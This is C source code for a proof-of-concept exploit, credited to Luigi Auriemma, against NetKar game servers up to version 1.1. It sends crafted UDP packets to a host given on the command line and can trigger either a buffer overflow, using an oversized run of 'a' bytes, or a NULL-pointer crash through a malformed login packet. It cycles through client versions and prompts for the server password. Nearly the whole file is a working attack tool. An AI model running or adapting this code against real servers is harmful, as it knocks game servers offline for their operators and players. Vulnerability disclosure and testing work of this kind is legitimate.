/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
    #define stricmp strcasecmp
    #define strnicmp strncasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        9500
#define BUFFSZ      1000    // max packet size



void fgetz(u8 *data, int len);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int putcc(u8 *buff, int chr, int len);
int putsx(u8 *buff, u8 *data, int len);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  linger  ling = {1,1};
    struct  sockaddr_in peer;
    int     sd,
            bug,
            len,
            ver     = 113;
    u16     port    = PORT;
    u8      buff[BUFFSZ],
            pass[0x18 + 1] = "",
            *host,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "NetKar <= 1.1 (1.0.3) buffer-overflow and NULL pointer "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug> <host> [port(%hu)]\n"
            "\n"
            "Bugs:\n"
            " 1 = buffer-overflow\n"
            " 2 = NULL pointer\n"
            "\n", argv[0], port);
        exit(1);
    }

    bug  = atoi(argv[1]);
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

redo:
    p = buff;
    *p++ = 0x14;
    if(bug == 1) {
        printf("\n- test buffer-overflow (try version %d)\n", ver);
        p += putcc(p, 'a', BUFFSZ - 1);
    } else if(bug == 2) {
        printf("\n- test NULL pointer (try version %d)\n", ver);
        p += putsx(p, "account_<>?:", 0x40);
        p += putsx(p, "username",   0x15);
        p += putsx(p, "team",       0x15);
        p += putsx(p, "",           0x10);
        p += putsx(p, "model",      0x10);
        p += putxx(p, 81,           16);    // race number
        p += putxx(p, 0,            32);    // version, done later
        p += putxx(p, 60,           8);     // bandwidth
        p += putsx(p, "",           0x18);  // password and admin password (the same), done later
        p += putxx(p, (int)0.265000,32);
        p += putxx(p, (int)0.280000,32);
        p += putsx(p, "AV_FormulaRG_Front.nkt", 0x20);
        p += putsx(p, "AV_FormulaRG_Rear.nkt", 0x20);
        p += putxx(p, 0,            32);
        p += putsx(p, "italy",      0x30);
    } else {
        printf("\nError: invalid bug number (%d)\n", bug);
        exit(1);
    }
    putxx(buff + 0x8d, ver,         32);
    putsx(buff + 0x92, pass,        0x18);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
    send_recv(sd, buff, p - buff, NULL, 0, &peer, 1);
    if(ver == 113) {    // test previous version too, because doesn't reply if different
        putxx(buff + 0x8d, 107, 32);
        send_recv(sd, buff, p - buff, NULL, 0, &peer, 1);
        putxx(buff + 0x8d,  11, 32);
        send_recv(sd, buff, p - buff, NULL, 0, &peer, 1);
    }
    len = send_recv(sd, NULL, 0, buff, BUFFSZ, &peer, 0);
    close(sd);
    if(len > 0) {
        if((buff[0] == 0x6c) && !strnicmp(buff + 1, "Client software not updated", 27)) {
            ver++;
            goto redo;
        }
        if((buff[0] == 0x6c) && !strnicmp(buff + 1, "Client software is newer", 24)) {
            ver--;
            goto redo;
        }
        if(buff[0] == 0x1b) {
            printf("\n- invalid password, insert the correct keyword:\n  ");
            fgetz(pass, sizeof(pass));
            goto redo;
        }
    }

    printf("\n- check the server manually for verifying if it's vulnerable or not\n");
    return(0);
}



void fgetz(u8 *data, int len) {
    u8      *p;

    fgets(data, len, stdin);
    for(p = data; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        fputc('.', stdout);
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) goto quit;
        return(0);
    }
    if(in) {
        for(retry = 2; retry; retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



int putcc(u8 *buff, int chr, int len) {
    memset(buff, chr, len);
    return(len);
}



int putsx(u8 *buff, u8 *data, int len) {
    strncpy(buff, data, len);
    return(len);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = num >> (i << 3);
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


